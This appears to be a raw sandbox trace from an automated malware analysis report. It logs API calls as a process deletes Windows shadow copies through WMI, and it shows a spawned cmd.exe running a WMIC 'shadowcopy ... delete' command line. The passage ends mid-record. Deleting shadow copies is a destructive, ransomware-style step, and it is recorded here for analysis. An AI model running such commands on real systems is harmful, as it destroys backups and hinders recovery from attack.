[0117.166] free (_Block=0x32cc40) [0117.166] free (_Block=0x32cc20) [0117.167] free (_Block=0x32cba0) [0117.167] CoSetProxyBlanket (pProxy=0x1c23c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.167] free (_Block=0x32cce0) [0117.167] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.167] ??0CHString@@QEAA@XZ () returned 0x12f300 [0117.167] GetCurrentThreadId () returned 0x488 [0117.167] malloc (_Size=0x18) returned 0x32cce0 [0117.167] lstrlenA (lpString="") returned 0 [0117.167] malloc (_Size=0x2) returned 0x33dfb0 [0117.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff80314c, cbMultiByte=-1, lpWideCharStr=0x33dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.168] free (_Block=0x33dfb0) [0117.168] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 0x50 [0117.168] SysStringLen (param_1="") returned 0x0 [0117.168] free (_Block=0x32cce0) [0117.168] malloc (_Size=0x18) returned 0x32cce0 [0117.168] IWbemServices:ExecQuery (in: This=0x1c23c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'", lFlags=0, pCtx=0x0, ppEnum=0x12f308 | out: ppEnum=0x12f308*=0x1c23d18) returned 0x0 [0117.214] free (_Block=0x32cce0) [0117.214] CoSetProxyBlanket (pProxy=0x1c23d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.217] IEnumWbemClassObject:Next (in: This=0x1c23d18, lTimeout=-1, uCount=0x1, apObjects=0x12f310, puReturned=0x12f320 | out: apObjects=0x12f310*=0x1c23d80, puReturned=0x12f320*=0x1) returned 0x0 [0117.218] malloc (_Size=0x18) returned 0x32cce0 [0117.219] IWbemClassObject:Get (in: This=0x1c23d80, wszName="__PATH", lFlags=0, pVal=0x12f330*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f330*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.219] free (_Block=0x32cce0) [0117.219] malloc (_Size=0x800) returned 0x32d080 [0117.219] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x32d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0117.219] FormatMessageW (in: dwFlags=0x2500, lpSource=0x32d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x12f258, nSize=0x0, Arguments=0x12f268 | out: lpBuffer="뚐\x1d") returned 0x67 [0117.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0117.219] malloc (_Size=0x68) returned 0x32d890 [0117.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x32d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0117.219] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff872ab0 [0117.219] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0117.226] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0117.226] free (_Block=0x32d890) [0117.226] free (_Block=0x32d080) [0117.226] LocalFree (hMem=0x1db690) returned 0x0 [0117.227] IWbemServices:DeleteInstance (in: This=0x1c23c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0119.726] IUnknown:Release (This=0x1c23d80) returned 0x0 [0119.726] malloc (_Size=0x800) returned 0x32d080 [0119.726] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x32d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0119.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0119.726] malloc (_Size=0x20) returned 0x32cef0 [0119.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x32cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0119.726] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff872ab0 [0119.726] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0119.726] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0119.726] free (_Block=0x32cef0) [0119.726] free (_Block=0x32d080) [0119.727] IEnumWbemClassObject:Next (in: This=0x1c23d18, lTimeout=-1, uCount=0x1, apObjects=0x12f310, puReturned=0x12f320 | out: apObjects=0x12f310*=0x0, puReturned=0x12f320*=0x0) returned 0x1 [0119.727] IUnknown:Release (This=0x1c23d18) returned 0x0 [0119.728] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0119.728] free (_Block=0x32cca0) [0119.728] free (_Block=0x32ccc0) [0119.728] GetCurrentThreadId () returned 0x488 [0119.728] ??0CHString@@QEAA@PEBG@Z () returned 0x12f4e8 [0119.728] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x12f4e8 [0119.728] lstrlenW (lpString="LIST") returned 4 [0119.728] lstrlenW (lpString="delete") returned 6 [0119.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0119.728] lstrlenW (lpString="ASSOC") returned 5 [0119.728] lstrlenW (lpString="delete") returned 6 [0119.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0119.728] lstrlenW (lpString="GET") returned 3 [0119.728] lstrlenW (lpString="delete") returned 6 [0119.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0119.729] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0119.729] WbemLocator:IUnknown:Release (This=0x1c23c18) returned 0x0 [0119.729] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0119.729] _kbhit () returned 0x0 [0119.729] free (_Block=0x326f20) [0119.730] free (_Block=0x32cac0) [0119.730] free (_Block=0x32caa0) [0119.730] free (_Block=0x32ca80) [0119.730] free (_Block=0x32ca60) [0119.730] free (_Block=0x3270a0) [0119.730] free (_Block=0x32cb40) [0119.730] free (_Block=0x3285c0) [0119.730] free (_Block=0x32d020) [0119.730] free (_Block=0x32cbc0) [0119.730] free (_Block=0x32cfa0) [0119.730] free (_Block=0x32cae0) [0119.730] free (_Block=0x32cbe0) [0119.730] free (_Block=0x327140) [0119.730] free (_Block=0x326e00) [0119.730] free (_Block=0x32cff0) [0119.730] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0119.730] free (_Block=0x32ce20) [0119.730] free (_Block=0x32cb00) [0119.730] free (_Block=0x32cb20) [0119.730] free (_Block=0x32cf30) [0119.731] free (_Block=0x32cb60) [0119.731] free (_Block=0x327ee0) [0119.731] free (_Block=0x327f30) [0119.731] free (_Block=0x327f80) [0119.731] free (_Block=0x32cb80) [0119.731] free (_Block=0x326a20) [0119.731] free (_Block=0x326de0) [0119.731] free (_Block=0x328040) [0119.731] free (_Block=0x326dc0) [0119.731] free (_Block=0x328000) [0119.731] free (_Block=0x326d60) [0119.731] free (_Block=0x326d80) [0119.731] free (_Block=0x326c40) [0119.731] free (_Block=0x326c60) [0119.731] free (_Block=0x326be0) [0119.731] free (_Block=0x326c00) [0119.731] free (_Block=0x326ca0) [0119.731] free (_Block=0x326cc0) [0119.731] free (_Block=0x326d00) [0119.731] free (_Block=0x326d20) [0119.731] free (_Block=0x326b20) [0119.731] free (_Block=0x326b40) [0119.732] free (_Block=0x326ac0) [0119.732] free (_Block=0x326ae0) [0119.732] free (_Block=0x326b80) [0119.732] free (_Block=0x326ba0) [0119.732] free (_Block=0x326a60) [0119.732] free (_Block=0x326a80) [0119.732] free (_Block=0x3269d0) [0119.732] free (_Block=0x3269a0) [0119.732] free (_Block=0x326e90) [0119.732] WbemLocator:IUnknown:Release (This=0x1c11390) returned 0x2 [0119.732] WbemLocator:IUnknown:Release (This=0x1c23b28) returned 0x0 [0119.732] WbemLocator:IUnknown:Release (This=0x1c23a98) returned 0x0 [0119.732] WbemLocator:IUnknown:Release (This=0x1c11390) returned 0x1 [0119.732] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0119.733] WbemLocator:IUnknown:Release (This=0x1c11390) returned 0x0 [0119.733] free (_Block=0x32c9e0) [0119.733] free (_Block=0x32ca00) [0119.733] free (_Block=0x328540) [0119.733] free (_Block=0x32ca20) [0119.733] free (_Block=0x32ca40) [0119.733] free (_Block=0x328580) [0119.733] free (_Block=0x32c860) [0119.733] free (_Block=0x32c880) [0119.733] free (_Block=0x3283c0) [0119.733] free (_Block=0x32c8a0) [0119.733] free (_Block=0x32c8c0) [0119.733] free (_Block=0x328400) [0119.733] free (_Block=0x32c7e0) [0119.733] free (_Block=0x32c800) [0119.733] free (_Block=0x328340) [0119.733] free (_Block=0x32c820) [0119.733] free (_Block=0x32c840) [0119.733] free (_Block=0x328380) [0119.734] free (_Block=0x32c960) [0119.734] free (_Block=0x32c980) [0119.734] free (_Block=0x3284c0) [0119.734] free (_Block=0x32c9a0) [0119.734] free (_Block=0x32c9c0) [0119.734] free (_Block=0x328500) [0119.734] free (_Block=0x32c760) [0119.734] free (_Block=0x32c780) [0119.734] free (_Block=0x3282c0) [0119.734] free (_Block=0x32c7a0) [0119.734] free (_Block=0x32c7c0) [0119.734] free (_Block=0x328300) [0119.734] free (_Block=0x32c8e0) [0119.734] free (_Block=0x32c900) [0119.734] free (_Block=0x328440) [0119.734] free (_Block=0x32c920) [0119.734] free (_Block=0x32c940) [0119.734] free (_Block=0x328480) [0119.734] free (_Block=0x32c6a0) [0119.734] free (_Block=0x32c6c0) [0119.735] free (_Block=0x328200) [0119.735] free (_Block=0x32c560) [0119.735] free (_Block=0x32c580) [0119.735] free (_Block=0x3280c0) [0119.735] free (_Block=0x326e50) [0119.735] free (_Block=0x326e70) [0119.735] free (_Block=0x328080) [0119.735] free (_Block=0x32c5e0) [0119.735] free (_Block=0x32c600) [0119.735] free (_Block=0x328140) [0119.735] free (_Block=0x32c6e0) [0119.735] free (_Block=0x32c700) [0119.735] free (_Block=0x328240) [0119.735] free (_Block=0x32c5a0) [0119.735] free (_Block=0x32c5c0) [0119.735] free (_Block=0x328100) [0119.735] free (_Block=0x32c620) [0119.735] free (_Block=0x32c640) [0119.735] free (_Block=0x328180) [0119.736] free (_Block=0x32c660) [0119.736] free (_Block=0x32c680) [0119.736] free (_Block=0x3281c0) [0119.736] free (_Block=0x32c720) [0119.736] free (_Block=0x32c740) [0119.736] free (_Block=0x328280) [0119.736] CoUninitialize () [0119.761] exit (_Code=0) [0119.761] free (_Block=0x32cd30) [0119.761] free (_Block=0x327ea0) [0119.761] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0119.761] free (_Block=0x326f40) [0119.761] free (_Block=0x326a40) [0119.761] free (_Block=0x327e60) [0119.761] free (_Block=0x327e20) [0119.761] free (_Block=0x327dd0) [0119.761] free (_Block=0x327d90) [0119.761] free (_Block=0x327d30) [0119.761] free (_Block=0x325a90) [0119.761] free (_Block=0x325a50) [0119.761] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0119.761] free (_Block=0x32cec0) Thread: id = 232 os_tid = 0x408 Thread: id = 233 os_tid = 0x564 Thread: id = 234 os_tid = 0x130 Thread: id = 235 os_tid = 0x9f0 Thread: id = 236 os_tid = 0xa08 Process: id = "44" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7152b000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 237 os_tid = 0x68c [0119.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa90 | out: lpSystemTimeAsFileTime=0x26fa90*(dwLowDateTime=0x4edff230, dwHighDateTime=0x1d68245)) [0119.859] GetCurrentProcessId () returned 0x634 [0119.859] GetCurrentThreadId () returned 0x68c [0119.859] GetTickCount () returned 0x11537e3 [0119.859] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa98 | out: lpPerformanceCount=0x26fa98*=23975202048) returned 1 [0119.859] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac30000 [0119.859] __set_app_type (_Type=0x1) [0119.859] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac57810) returned 0x0 [0119.859] __getmainargs (in: _Argc=0x4ac7a608, _Argv=0x4ac7a618, _Env=0x4ac7a610, _DoWildCard=0, _StartInfo=0x4ac5e0f4 | out: _Argc=0x4ac7a608, _Argv=0x4ac7a618, _Env=0x4ac7a610) returned 0 [0119.860] GetCurrentThreadId () returned 0x68c [0119.860] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x68c) returned 0x3c [0119.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0119.860] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0119.860] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.861] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.861] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa28 | out: phkResult=0x26fa28*=0x0) returned 0x2 [0119.861] VirtualQuery (in: lpAddress=0x26fa10, lpBuffer=0x26f990, dwLength=0x30 | out: lpBuffer=0x26f990*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.861] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f990, dwLength=0x30 | out: lpBuffer=0x26f990*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.861] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f990, dwLength=0x30 | out: lpBuffer=0x26f990*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.861] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26f990, dwLength=0x30 | out: lpBuffer=0x26f990*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.861] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f990, dwLength=0x30 | out: lpBuffer=0x26f990*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0119.861] GetConsoleOutputCP () returned 0x1b5 [0119.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac6bfe0 | out: lpCPInfo=0x4ac6bfe0) returned 1 [0119.861] SetConsoleCtrlHandler (HandlerRoutine=0x4ac53184, Add=1) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.862] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac5e194 | out: lpMode=0x4ac5e194) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.862] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac5e198 | out: lpMode=0x4ac5e198) returned 1 [0119.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.863] GetEnvironmentStringsW () returned 0x368b90* [0119.863] GetProcessHeap () returned 0x350000 [0119.863] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xa7c) returned 0x369620 [0119.863] FreeEnvironmentStringsW (penv=0x368b90) returned 1 [0119.863] GetProcessHeap () returned 0x350000 [0119.863] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x8) returned 0x368a10 [0119.863] GetEnvironmentStringsW () returned 0x368b90* [0119.863] GetProcessHeap () returned 0x350000 [0119.863] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xa7c) returned 0x36a0b0 [0119.864] FreeEnvironmentStringsW (penv=0x368b90) returned 1 [0119.864] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e8e8 | out: phkResult=0x26e8e8*=0x44) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x18, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x1, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x1, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x0, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x40, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x40, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x40, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.864] RegCloseKey (hKey=0x44) returned 0x0 [0119.864] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e8e8 | out: phkResult=0x26e8e8*=0x44) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x40, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x1, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x1, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.864] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x0, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.865] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x9, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.865] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x4, lpData=0x26e900*=0x9, lpcbData=0x26e8e4*=0x4) returned 0x0 [0119.865] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8e0, lpData=0x26e900, lpcbData=0x26e8e4*=0x1000 | out: lpType=0x26e8e0*=0x0, lpData=0x26e900*=0x9, lpcbData=0x26e8e4*=0x1000) returned 0x2 [0119.865] RegCloseKey (hKey=0x44) returned 0x0 [0119.865] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51745c [0119.865] srand (_Seed=0x5f51745c) [0119.865] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" [0119.865] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" [0119.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0119.865] GetProcessHeap () returned 0x350000 [0119.865] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x218) returned 0x36ab40 [0119.865] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.866] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.866] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.866] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.866] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.866] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.866] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.866] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.866] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.866] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.866] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.866] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.866] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.866] GetProcessHeap () returned 0x350000 [0119.866] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x369620 | out: hHeap=0x350000) returned 1 [0119.866] GetEnvironmentStringsW () returned 0x368b90* [0119.866] GetProcessHeap () returned 0x350000 [0119.866] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xa94) returned 0x36ad60 [0119.866] FreeEnvironmentStringsW (penv=0x368b90) returned 1 [0119.866] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.866] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.867] GetProcessHeap () returned 0x350000 [0119.867] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x5c) returned 0x36b800 [0119.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0119.867] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6f0, lpFilePart=0x26f6d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f6d0*="Desktop") returned 0x25 [0119.867] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0119.867] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f400 | out: 